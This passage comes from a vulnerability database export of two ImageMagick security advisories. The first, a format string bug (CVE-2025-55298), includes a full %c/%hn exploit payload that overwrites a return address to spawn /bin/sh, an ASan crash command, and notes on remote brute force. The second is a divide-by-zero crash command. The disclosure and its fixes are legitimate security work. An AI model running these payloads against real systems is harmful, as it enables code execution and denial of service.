### root cause
```
MagickExport size_t InterpretImageFilename(const ImageInfo *image_info,
  Image *image,const char *format,int value,char *filename,
  ExceptionInfo *exception)
{

...

  while ((cursor=strchr(cursor,'%')) != (const char *) NULL)
  {
    const char
      *q = cursor;

    ssize_t
      offset = (ssize_t) (cursor-format);

    cursor++;  /* move past '%' */
    if (*cursor == '%')
      {
        /*
          Escaped %%.
        */
        cursor++;
        continue;
      }
    /*
      Skip padding digits like %03d.
    */
    if (isdigit((int) ((unsigned char) *cursor)) != 0)
      (void) strtol(cursor,(char **) &cursor,10);
    switch (*cursor)
    {
      case 'd':
      case 'o':
      case 'x':
      {
        ssize_t
          count;

        count=FormatLocaleString(pattern,sizeof(pattern),q,value);
        if ((count <= 0) || (count >= MagickPathExtent) ||
            ((offset+count) >= MagickPathExtent))
          return(0);
        (void) CopyMagickString(p+offset,pattern,(size_t) (MagickPathExtent-
          offset));
        cursor++;
        break;
      }
```
When the InterpretImageFilename function processes a filename beginning with format specifiers such as %d, %o, or %x, the filename string is directly passed as a parameter to the FormatLocaleString function.
<br>
```
MagickExport ssize_t FormatLocaleString(char *magick_restrict string,
  const size_t length,const char *magick_restrict format,...)
{
  ssize_t
    n;

  va_list
    operands;

  va_start(operands,format);
  n=FormatLocaleStringList(string,length,format,operands);
  va_end(operands);
  return(n);
}
```
```
MagickPrivate ssize_t FormatLocaleStringList(char *magick_restrict string,
  const size_t length,const char *magick_restrict format,va_list operands)
{
...
n=(ssize_t) _vsnprintf_l(string,length,format,locale,operands);
```
Inside FormatLocaleString, the variable argument list is initialized through va_start, after which the format string processing occurs by interpreting the format specifiers and using corresponding values from CPU registers and the call stack as arguments for the formatting operations.
<br>
## PoC
### 1. Heap overflow read tested on development container
```
root@9184bf32bd0f:/workspaces/ImageMagick# mogrify %o%n
=================================================================
==55653==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000001 at pc 0x5bdccaae689e bp 0x7fff6882c410 sp 0x7fff6882c408
READ of size 8 at 0x603000000001 thread T0
    #0 0x5bdccaae689d in SplaySplayTree splay-tree.c
    #1 0x5bdccaae865e in GetValueFromSplayTree (/ImageMagick/bin/magick+0x59165e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #2 0x5bdccaa8e47b in GetImageOption (/ImageMagick/bin/magick+0x53747b) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #3 0x5bdccaa63c39 in SyncImageSettings (/ImageMagick/bin/magick+0x50cc39) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #4 0x5bdccaa63036 in AcquireImage (/ImageMagick/bin/magick+0x50c036) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #5 0x5bdccaa70cc4 in SetImageInfo (/ImageMagick/bin/magick+0x519cc4) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #6 0x5bdccae42e13 in ReadImages (/ImageMagick/bin/magick+0x8ebe13) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #7 0x5bdccb11ee08 in MogrifyImageCommand (/ImageMagick/bin/magick+0xbc7e08) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #8 0x5bdccb103ca9 in MagickCommandGenesis (/ImageMagick/bin/magick+0xbacca9) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #9 0x5bdccaa5f939 in main (/ImageMagick/bin/magick+0x508939) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #10 0x73b2102b2d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)
    #11 0x73b2102b2e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)
    #12 0x5bdcca99f404 in _start (/ImageMagick/bin/magick+0x448404) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)

0x603000000001 is located 15 bytes to the left of 24-byte region [0x603000000010,0x603000000028)
allocated by thread T0 here:
    #0 0x5bdccaa2224e in malloc (/ImageMagick/bin/magick+0x4cb24e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)
    #1 0x73b21031915a  (/lib/x86_64-linux-gnu/libc.so.6+0x9015a) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)

SUMMARY: AddressSanitizer: heap-buffer-overflow splay-tree.c in SplaySplayTree
Shadow bytes around the buggy address:
  0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c067fff8000:[fa]fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8010: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8040: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==55653==ABORTING
```
Processing a malicious filename containing format string specifiers such as %d%n results in corruption of the SplayTree structure stored in the r8 register. The corrupted structure contains invalid pointer values that are later dereferenced by the SplaySplayTree function, causing the function to access unintended memory locations and triggering a heap overflow condition.
<br>

### 2. Shell execution tested on a local environment

https://github.com/user-attachments/assets/00e6a091-8e77-48f0-959e-c05eff69ff94

```
 ~/fuzz gdb -nx -args ./patchedsecure/bin/mogrify %d%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%17995c%hn%c%c%c%c%c%c%c%c%c%65529c%hn%93659c%2176\$hn%233c%2194\$hhnaaaaaaaaa
```
The exploit achieves remote code execution by leveraging format string vulnerabilities to perform a write-what-where attack. The payload systematically overwrites return addresses on the stack, redirecting program execution to a one-gadget ROP chain that spawns a shell with the current process privileges.
<br>

**Exploitation Process:**
1. Format string payload corrupts stack pointers through positional parameters
2. Multiple 2-byte writes (%hn) progressively overwrite the return address  
3. Final payload redirects execution to a one-gadget (0x00007ffff66ebc85)
4. One-gadget executes `/bin/sh` with inherited process permissions
<br>

**Remote Exploitation Feasibility:**
While this PoC demonstrates local shell execution with ASLR disabled, remote code execution is achievable in real-world scenarios through brute force attacks. When stack layout conditions are favorable, attackers can perform 1.5-byte return address brute force and 1.5-byte libc base address brute force to gain shell access.
<br>

**Important:** The numeric parameters within the format string payload are environment-dependent and may require modification for different target systems due to variations in memory layout and stack structure.

**Note:** This demonstrates complete system compromise, as the attacker gains interactive shell access to the target system.
<br>

## Impact
This format string vulnerability enables attackers to achieve complete system compromise through arbitrary memory read/write operations and remote code execution. Attackers can access sensitive data stored in process memory, overwrite critical system structures, and execute arbitrary code with ImageMagick's privileges.

The vulnerability is particularly dangerous in web applications processing user-uploaded images and automated image processing systems. Successful exploitation can lead to privilege escalation, data exfiltration, and lateral movement within compromised networks.
<br>

## Suggested Fix

Two potential mitigation approaches:

1. **Input Validation**: Add format string validation in `InterpretImageFilename` to reject filenames containing format specifiers (`%n`, `%s`, `%x`, etc.) before passing to `FormatLocaleString`
2. **Safe Parsing**: Modify the format string processing to parse and validate each format specifier individually rather than passing the entire user-controlled string directly to `FormatLocaleString`
<br>

## Credits
### Team Daemon Fuzz Hunters
**Bug Hunting Master Program, HSpace/Findthegap**
<br>

**Woojin Park**
@jin-156
[1203kids@gmail.com](mailto:1203kids@gmail.com)

**Hojun Lee**
@leehohojune 
[leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr)

**Youngin Won**
@amethyst0225
[youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr)

**Siyeon Han**
@hanbunny
[kokosyeon@gmail.com](mailto:kokosyeon@gmail.com)

# Additional notes from the ImageMagick team:

On many modern toolchains and OSes, format‑string exploits using %n are already mitigated or blocked by default (e.g., -Wformat-security, _FORTIFY_SOURCE, hardened libc behavior, ASLR/stack canaries). That can make exploitation impractical in typical builds so you might not be vulnerable but it would still be wise to upgrade to the most recent version. We also already provide the following mitigation:

To prevent unintended interpretation of the filename as a format string, users can explicitly disable format string parsing by defining the filename as a literal. This can be done using the following directive:

- In wrappers: `filename:literal`
- From the command line: `-define filename:literal=true`
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55298.json
reference_id
reference_type
scores
0
value 7.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55298.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-55298
reference_id
reference_type
scores
0
value 0.00754
scoring_system epss
scoring_elements 0.73277
published_at 2026-04-21T12:55:00Z
1
value 0.00754
scoring_system epss
scoring_elements 0.73285
published_at 2026-04-18T12:55:00Z
2
value 0.00754
scoring_system epss
scoring_elements 0.73275
published_at 2026-04-16T12:55:00Z
3
value 0.00754
scoring_system epss
scoring_elements 0.73233
published_at 2026-04-13T12:55:00Z
4
value 0.00754
scoring_system epss
scoring_elements 0.7324
published_at 2026-04-12T12:55:00Z
5
value 0.00754
scoring_system epss
scoring_elements 0.73259
published_at 2026-04-11T12:55:00Z
6
value 0.00754
scoring_system epss
scoring_elements 0.73234
published_at 2026-04-09T12:55:00Z
7
value 0.00754
scoring_system epss
scoring_elements 0.73211
published_at 2026-04-04T12:55:00Z
8
value 0.00754
scoring_system epss
scoring_elements 0.73185
published_at 2026-04-07T12:55:00Z
9
value 0.00754
scoring_system epss
scoring_elements 0.73221
published_at 2026-04-08T12:55:00Z
10
value 0.00754
scoring_system epss
scoring_elements 0.7319
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-55298
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55298
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55298
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/439b362b93c074eea6c3f834d84982b43ef057d5
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/
url https://github.com/ImageMagick/ImageMagick/commit/439b362b93c074eea6c3f834d84982b43ef057d5
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9ccg-6pjw-x645
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9ccg-6pjw-x645
8
reference_url https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-55298
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-55298
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111586
reference_id 1111586
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111586
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2391097
reference_id 2391097
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2391097
12
reference_url https://github.com/advisories/GHSA-9ccg-6pjw-x645
reference_id GHSA-9ccg-6pjw-x645
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9ccg-6pjw-x645
13
reference_url https://usn.ubuntu.com/7812-1/
reference_id USN-7812-1
reference_type
scores
url https://usn.ubuntu.com/7812-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2gw3-qfan-jygd
4
vulnerability VCID-2zje-ag2v-7kac
5
vulnerability VCID-54da-fzyt-4ud2
6
vulnerability VCID-569d-6nue-5kbq
7
vulnerability VCID-5uyd-bv33-h7g1
8
vulnerability VCID-5zkt-kcgx-a3e2
9
vulnerability VCID-62ar-kwbq-nyh3
10
vulnerability VCID-69f6-ceje-hyah
11
vulnerability VCID-6h7x-3rue-kucp
12
vulnerability VCID-6meg-yjby-a7gj
13
vulnerability VCID-6rma-wjdv-uqe9
14
vulnerability VCID-6ztv-auh8-27gx
15
vulnerability VCID-acsa-1uwk-fqee
16
vulnerability VCID-anyp-2jr7-73a1
17
vulnerability VCID-b43n-3d1g-u3fe
18
vulnerability VCID-b5pd-kk97-gban
19
vulnerability VCID-bd1g-sfsp-37h7
20
vulnerability VCID-bw4q-dt1r-y3e4
21
vulnerability VCID-cbqr-aybx-d3e6
22
vulnerability VCID-cuhw-ew1g-s3h2
23
vulnerability VCID-d8yf-8rff-3yhf
24
vulnerability VCID-dabd-m3mf-3ker
25
vulnerability VCID-dtza-65ku-aber
26
vulnerability VCID-emmr-15qp-vfah
27
vulnerability VCID-f1zu-xb4j-8qhp
28
vulnerability VCID-fnck-7mvx-hqc9
29
vulnerability VCID-g41y-dv8u-3yf1
30
vulnerability VCID-gdg8-aejn-83c4
31
vulnerability VCID-h221-qd8d-tqa5
32
vulnerability VCID-jc5m-7rvc-2qg6
33
vulnerability VCID-jcjk-s89c-mbbm
34
vulnerability VCID-jvq6-xjbu-fkb9
35
vulnerability VCID-kdw5-8y5z-zya5
36
vulnerability VCID-kefv-kpkk-wudf
37
vulnerability VCID-mntx-6yku-3qcx
38
vulnerability VCID-mxg1-261s-nbds
39
vulnerability VCID-n47w-r932-abey
40
vulnerability VCID-p5aw-n691-nkff
41
vulnerability VCID-pcme-bwan-3bcf
42
vulnerability VCID-r3vw-ncns-cqgb
43
vulnerability VCID-rbdg-vz8x-ykah
44
vulnerability VCID-rj9n-ra1t-77dy
45
vulnerability VCID-rjkf-pdny-2fhn
46
vulnerability VCID-sd54-b8z1-2fg7
47
vulnerability VCID-sd7w-6qv5-73ge
48
vulnerability VCID-sdc2-fcap-abaz
49
vulnerability VCID-spch-fffg-4yc5
50
vulnerability VCID-sw7g-hxxr-n3e1
51
vulnerability VCID-tv15-dcnu-pbbn
52
vulnerability VCID-utfe-h3b7-jqcj
53
vulnerability VCID-uvpj-a8v5-ebgz
54
vulnerability VCID-vaks-d4k5-zue7
55
vulnerability VCID-vkp6-wh22-eqap
56
vulnerability VCID-vpdn-g1k9-1kdn
57
vulnerability VCID-x44m-x33k-hydn
58
vulnerability VCID-x8c6-9pse-xkc8
59
vulnerability VCID-xbsu-ac6g-53fn
60
vulnerability VCID-y4hn-6bv6-jugw
61
vulnerability VCID-y58b-be93-hbfd
62
vulnerability VCID-yx7r-r7ez-7uhp
63
vulnerability VCID-z9t9-bxf9-hkfk
64
vulnerability VCID-zab9-9tqj-hbhg
65
vulnerability VCID-zpcy-nms7-kuha
66
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1
aliases CVE-2025-55298, GHSA-9ccg-6pjw-x645
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r889-wzc7-1yem
1
url VCID-uwj5-1fkf-7qg9
vulnerability_id VCID-uwj5-1fkf-7qg9
summary 
ImageMagick affected by divide-by-zero in ThumbnailImage via montage -geometry ":" leads to crash
## Summary
Passing a geometry string containing only a colon (":") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service.

## Details
**Root Cause**
1. `montage -geometry ":" ...` reaches `MagickCore/geometry.c:GetGeometry().`
2. `StringToDouble/InterpretLocaleValue` parses `":"` as `0.0;` then: 
https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355
`WidthValue` (and/or `HeightValue)` is set with a zero dimension.
3. In MagickCore/resize.c:ThumbnailImage(), the code computes:
https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629
causing a division by zero and immediate crash.

The issue is trivially triggerable without external input files (e.g., using `xc:white`).

### Reproduction
Environment
```
Version: ImageMagick 7.1.2-1 (Beta) Q16-HDRI x86_64 0ba1b587b:20250812 https://imagemagick.org
Features: Cipher DPC HDRI
Delegates (built-in): bzlib fontconfig freetype jbig jng jpeg lcms lzma pangocairo png tiff x xml zlib
Compiler: clang (14.0.0)
OS/Arch: Linux x86_64
```
Steps
```
./bin/magick montage -geometry : xc:white null:
```
Observed result
```
IOT instruction (core dumped)
# (Environment-dependent: SIGFPE/abort may be observed.)
```

## PoC
No external file required; the pseudo image xc:white suffices:
```
./bin/magick montage -geometry : xc:white null:
```

## Impact
- **Denial of Service:** A divide-by-zero in `ThumbnailImage()` causes immediate abnormal termination (e.g., SIGFPE/abort), crashing the ImageMagick process.


## Suggested fix
Defensively reject zero dimensions early in `ThumbnailImage()`:
```c
if ((columns == 0) || (rows == 0)) {
  (void) ThrowMagickException(exception, GetMagickModule(), OptionError,
    "InvalidGeometry", "thumbnail requires non-zero dimensions: %.20gx%.20g",
    (double) columns, (double) rows);
  return (Image *) NULL;
}
```
Additionally, consider tightening validation in `GetGeometry()` so that colon-only (and similar malformed) inputs do not yield `WidthValue/HeightValue` with zero, or are rejected outright. Variants like `"x:"` or `":x"` may also need explicit handling (maintainer confirmation requested).

## Credits
### Team Daemon Fuzz Hunters
**Bug Hunting Master Program, HSpace/Findthegap**
<br>

**Woojin Park**
@jin-156
[1203kids@gmail.com](mailto:1203kids@gmail.com)

**Hojun Lee**
@leehohojune 
[leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr)

**Youngin Won**
@amethyst0225
[youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr)

**Siyeon Han**
@hanbunny
[kokosyeon@gmail.com](mailto:kokosyeon@gmail.com)
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55212.json
reference_id
reference_type
scores
0
value 3.7
